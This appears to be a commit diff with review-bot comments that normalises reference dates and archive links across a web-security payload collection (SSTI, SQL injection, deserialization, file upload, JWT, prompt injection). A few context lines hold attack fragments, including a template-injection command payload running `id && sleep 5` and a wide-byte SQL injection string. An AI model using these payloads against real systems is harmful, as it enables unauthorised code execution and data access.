- [HIP19 Writeup - Meet Your Doctor 1,2,3 - Swissky - June 22, 2019](https://web.archive.org/web/20190825033521/https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - 5 November 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - November 5, 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
- [Introduction to GraphQL - GraphQL - November 1, 2024](https://web.archive.org/web/20160917011216/http://graphql.org:80/learn)
- [Introspection query leaks sensitive graphql system information - @Zuriel - November 18, 2017](https://web.archive.org/web/20250710175416/https://hackerone.com/reports/291531)
- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - 8 June 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - Feb 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - Nov 6th 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - June 8, 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - February 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - November 6, 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
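Review bot: `Introduction to GraphQL - GraphQL - November 1, 2024` links to a 2016 capture (`web/20160917011216`), so the date postdates the archived page by eight years; either link a 2024 capture or date the entry to the snapshot. Ordering is also off: `API Hacking GraphQL` and `Discovering GraphQL endpoints...` follow `GraphQL for Pentesters presentation` instead of sitting in alphabetical position.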


@@ -302,7 +302,7 @@ Common secrets from the [documentation](https://cwiki.apache.org/confluence/disp
* [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/)
* [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
* [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
* [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
* [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
* [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126)
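Review bot: duplicate entry: `Jackson CVE-2019-12384: anatomy of a vulnerability class` and `Jackson gadgets - Anatomy of a vulnerability` both point at the same capture (`web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html`) with the same author and date; keep one. The `jackson-docs` wiki and `Java-Deserialization-Cheat-Sheet` README links are not archived.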

View File

@@ -133,4 +133,4 @@ with open('exploit_unsafeloader.yml') as file:
* [Python Yaml Deserialization - HackTricks - July 19, 2024](https://web.archive.org/web/20241216145404/https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
* [PyYAML Documentation - PyYAML - April 29, 2006](https://web.archive.org/web/20260219140302/https://pyyaml.org/wiki/PyYAMLDocumentation)
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://web.archive.org/web/20250604032318/https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
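Review bot: the `Successful Errors` entry being normalised here sits after `YAML Deserialization Attack in Python`, which breaks the alphabetical order the rest of this list follows (Python, PyYAML, YAML); move it up between the `PyYAML Documentation` and `YAML Deserialization` entries.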

View File

@@ -89,6 +89,6 @@ Universal gadget for ruby 2.x - 3.x.
* [Ruby 2.X Universal RCE Deserialization Gadget Chain - Luke Jahnke - November 8, 2018](https://web.archive.org/web/20191128020715/https://www.elttam.com.au/blog/ruby-deserialization/)
* [Universal RCE with Ruby YAML.load - Etienne Stalmans (@_staaldraad) - March 2, 2019](https://web.archive.org/web/20190302114631/https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - 2024](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - August 17, 2019](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
* [Universal RCE with Ruby YAML.load (versions > 2.7) - Etienne Stalmans (@_staaldraad) - January 9, 2021](https://web.archive.org/web/20260201150417/https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
* [Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021](https://web.archive.org/web/20210610111705/https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
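Review bot: the new date on the PentesterLab entry, August 17, 2019, is the Wayback capture timestamp (`20190817140453`) rather than a publication date, so it is not more accurate than the `2024` it replaces; either find the exercise's real publication date or keep the year only. The list is also unsorted (Ruby, Universal, Ruby, Universal, Blind), and since the elttam and PentesterLab entries have near-identical titles, alphabetising would at least put them side by side.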

View File

@@ -38,5 +38,5 @@ Insecure Management Interface vulnerabilities arise when administrative interfac
## References
* [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://web.archive.org/web/20260116113320/https://capec.mitre.org/data/definitions/121.html)
* [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
* [Exploiting Spring Boot Actuators - Michael Stepankin - February 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
* [Springboot - Official Documentation - May 9, 2024](https://web.archive.org/web/20140725032126/http://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
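Review bot: the unchanged `Springboot - Official Documentation` line below the fix is dated May 9, 2024, but its archive capture is from `20140725032126`, ten years earlier, so the date and the link disagree; either point at a 2024 capture of the documentation or date the entry to the 2014 snapshot.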

View File

@@ -20,4 +20,4 @@
## References
* [my-chemical-romance - siunam - Feb 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
* [my-chemical-romance - siunam - February 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)

View File

@@ -46,4 +46,4 @@ For example in Git, the exploitation technique doesn't require to list the conte
## References
* [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
* [Hidden directories and files as a source of sensitive information about web application - bl4de - April 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)

View File

@@ -534,7 +534,7 @@ You should create your own key pair for this attack and host it. It should look
- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight - April 16, 2020](https://web.archive.org/web/20230104231143/https://insomniasec.com/blog/auth0-jwt-validation-bypass)
- [JSON Web Token Vulnerabilities - 0xn3va - March 27, 2022](https://web.archive.org/web/20260305090633/https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8, 2017](https://web.archive.org/web/20190405023824/https://trustfoundry.net/jwt-hacking-101/)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - dwyl - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
- [Privilege Escalation like a Boss - janijay007 - October 27, 2018](https://web.archive.org/web/20190723093831/https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
- [Simple JWT hacking - Hari Prasanth (@b1ack_h00d) - March 7, 2019](https://web.archive.org/web/20200724145838/https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
- [WebSec CTF - Authorization Token - JWT Challenge - Kris Hunt - August 7, 2016](https://web.archive.org/web/20211025223311/https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)

View File

@@ -165,7 +165,7 @@ end
## References
* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki) - January 14, 2025](https://web.archive.org/web/20250114083154/https://www.maki.bzh/writeups/ecw2018admyssion/)
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/)
* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
* [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
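Review bot: the date added to the Maki write-up, January 14, 2025, is the Wayback capture timestamp (`20250114083154`), not when it was published; the URL slug `ecw2018admyssion` and the neighbouring 0xUKN write-up (October 31, 2018) place it in late 2018, so the original date is recoverable and should be used. The title also still reads `AdmYSion` where the URL and the next entry spell it `AdmYSsion`.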

View File

@@ -209,6 +209,6 @@ Examples of Indirect Prompt medium:
* [Language Models are Few-Shot Learners - Tom B Brown - May 28, 2020](https://web.archive.org/web/20260306044348/https://arxiv.org/abs/2005.14165)
* [Large Language Model Prompts (RTC0006) - HADESS/RedTeamRecipe - March 26, 2023](http://web.archive.org/web/20230529085349/https://redteamrecipe.com/Large-Language-Model-Prompts/)
* [LLM Hacker's Handbook - Forces Unseen - March 7, 2023](https://doublespeak.chat/#/handbook)
* [Prompt Injection Attacks for Dummies - Devansh Batham - Mar 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
* [Prompt Injection Attacks for Dummies - Devansh Batham - March 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
* [The AI Attack Surface Map v1.0 - Daniel Miessler - May 15, 2023](https://web.archive.org/web/20251212164354/https://danielmiessler.com/blog/the-ai-attack-surface-map-v1-0)
* [You shall not pass: the spells behind Gandalf - Max Mathys and Václav Volhejn - June 2, 2023](https://web.archive.org/web/20230605141849/https://www.lakera.ai/insights/who-is-gandalf)

View File

@@ -767,7 +767,7 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://web.archive.org/web/20260227032450/https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20210215172533/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - January 18, 2024](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://web.archive.org/web/20260303030701/https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://web.archive.org/web/20250807062504/https://www.youtube.com/watch?si=kFQkvCEn2NiWLDGY&v=u91EdO1cDak&feature=youtu.be)
* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://web.archive.org/web/20201001181524/https://resources.infosecinstitute.com/sql-truncation-attack/)
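Review bot: the IPA ISEC entry loses information here: the previous `March 2010` was the document's own date, and the replacement, January 18, 2024, is just the capture timestamp (`20240118024024`) of the archived PDF; keep March 2010 (with a day if one is known) rather than dating a 2010 paper by when it was archived.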

View File

@@ -592,5 +592,5 @@ Bypass using keywords case insensitive or an equivalent operator.
* [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](https://web.archive.org/web/20260109024910/https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [SQLi Cheatsheet - NetSparker - March 19, 2022](https://web.archive.org/web/20220219223426/https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://web.archive.org/web/20231004093323/https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - July 31, 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
* [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)

View File

@@ -63,4 +63,4 @@ elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
## References
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)

View File

@@ -509,7 +509,7 @@ Time-Based:
## References
- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://web.archive.org/web/20200707130000/https://securitylab.github.com/research/bean-validation-RCE)
- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://web.archive.org/web/20230203103413/https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
- [Expression Language Injection - OWASP - December 4, 2019](https://web.archive.org/web/20200422030628/https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
- [Expression Language injection - PortSwigger - January 27, 2019](https://web.archive.org/web/20251215015718/https://portswigger.net/kb/issues/00100f20_expression-language-injection)
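Review bot: the Bean Stalking link is swapped for an archived copy, but `20200707130000` is a round timestamp that looks hand-written rather than an actual capture id; Wayback redirects to the nearest capture so the link probably works, but please load it and replace the timestamp with the capture id it resolves to, as the other entries in this list do.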
@@ -522,4 +522,4 @@ Time-Based:
- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://web.archive.org/web/20150808084830/https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://web.archive.org/web/20200501162014/https://www.youtube.com/watch?v=3cT0uE7Y87s)
- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://web.archive.org/web/20220412162651/https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
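Review bot: `Successful Errors` is normalised but left after `VelocityServlet Expression Language injection`, out of the alphabetical order this list otherwise keeps (Server-Side, Server-Side, VelocityServlet); move it up before the VelocityServlet entry.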

View File

@@ -169,4 +169,4 @@ ${= _.VERSION}
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://web.archive.org/web/20260207143828/https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)

View File

@@ -342,5 +342,5 @@ layout template:
## References
- [Limitations are just an illusion advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Server Side Template Injection (SSTI) via Twig escape handler - Grav - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
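Review bot: the Grav advisory line now has an author, but the Brumens entry just above it is dated March 24, 2025 while its archive capture is `20240906203847`, half a year earlier; a publication date later than the snapshot cannot be right, so check the post's date (or point at a later capture) while this list is being touched.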

View File

@@ -463,4 +463,4 @@ Reference and explanation of payload can be found [yeswehack/server-side-templat
- [Limitations are just an illusion advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://web.archive.org/web/20210826203322/https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://web.archive.org/web/20251006113218/https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
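Review bot: `Successful Errors` sits after `The minefield between syntaxes`, breaking the alphabetical order of this list (Limitations, Python, The minefield); move it before the `The minefield` entry. Both Brumens entries here also carry dates later than their captures (March 24, 2025 vs `20240906`; October 17, 2025 vs `20251006`), so one side of each pair is wrong and worth fixing in the same pass.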

View File

@@ -220,7 +220,7 @@ Once the template engine is identified, the attacker injects more complex expres
- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://web.archive.org/web/20160311193057/https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf)
- [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://web.archive.org/web/20231210014226/https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://web.archive.org/web/20260111213449/https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://web.archive.org/web/20180928123607/https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://web.archive.org/web/20251104003639/https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
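Review bot: `August 05, 2015` on the Kettle paper entry keeps the zero-padded day that this commit removes elsewhere (`January 03, 2026` becoming `January 3, 2026`); make it `August 5, 2015`. This list is also the only one in the commit that is not alphabetised, so consider sorting it while here.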

View File

@@ -88,4 +88,4 @@ Execute code using SSTI for **Slim** engine.
## References
- [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)

View File

@@ -392,22 +392,22 @@ More payloads in the folder `CVE FFmpeg HLS/`.
## References
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Maxence Schmitt and Lorenzo Stella - February 28, 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [Analysis of Python's .pth files as a persistence mechanism - @malmoeb - January 14, 2025](https://web.archive.org/web/20250218083206/https://dfir.ch/posts/publish_python_pth_extension/)
* [Arbitrary File Upload Tricks In Java - pyn3rd - 2022-05-07](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
* [Arbitrary File Upload Tricks In Java - pyn3rd - May 7, 2022](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
* [BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela - November 29, 2014](http://web.archive.org/web/20141231210005/https://secgeek.net/bookfresh-vulnerability/)
* [Bulletproof Jpegs Generator - Damien Cauquil (@virtualabs) - April 9, 2012](https://web.archive.org/web/20130606125954/http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l)
* [Encoding Web Shells in PNG IDAT chunks - phil - 04-06-2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
* [File Upload - HackTricks - 20/7/2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
* [Encoding Web Shells in PNG IDAT chunks - phil - April 6, 2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
* [File Upload - HackTricks - July 20, 2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
* [File Upload and PHP on IIS: >=? and <=* and "=. - Soroush Dalili (@irsdl) - July 23, 2014](https://web.archive.org/web/20231003035528/https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/)
* [File Upload restrictions bypass - Haboob Team - July 24, 2018](https://web.archive.org/web/20180724174319/https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
* [IIS - SOAP - Navigating The Shadows - 0xbad53c - 19/5/2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
* [IIS - SOAP - Navigating The Shadows - 0xbad53c - May 19, 2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
* [Injection points in popular image formats - Daniel Kalinowski - November 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://web.archive.org/web/20260219153035/https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February 23, 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - August 21, 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
* [PHDays - Attacks on video converters:a year later - Emil Lerner, Pavel Cheremushkin - December 20, 2017](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
* [The .phpt File Structure - PHP Internals Book - October 18, 2017](https://web.archive.org/web/20260218185252/https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
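Review bot: the phil entry is mis-converted: `04-06-2012` is day-first, as the URL path `/2012/06/` and the capture `20120610205435` show, so it should read June 4, 2012, not April 6, 2012. Apply the same check to the 0xbad53c entry, whose `19/5/2024` became May 19, 2024 although its capture is `20220404084558`, two years earlier; either that date or that snapshot is wrong.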

View File

@@ -578,7 +578,7 @@ Use browsers quirks to recreate some HTML tags.
- [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://web.archive.org/web/20231004090825/https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
- [Google XSS Turkey - Frans Rosén - June 6, 2015](https://web.archive.org/web/20231004100309/https://labs.detectify.com/2015/06/06/google-xss-turkey/)
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://web.archive.org/web/20260304011652/https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff)
- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
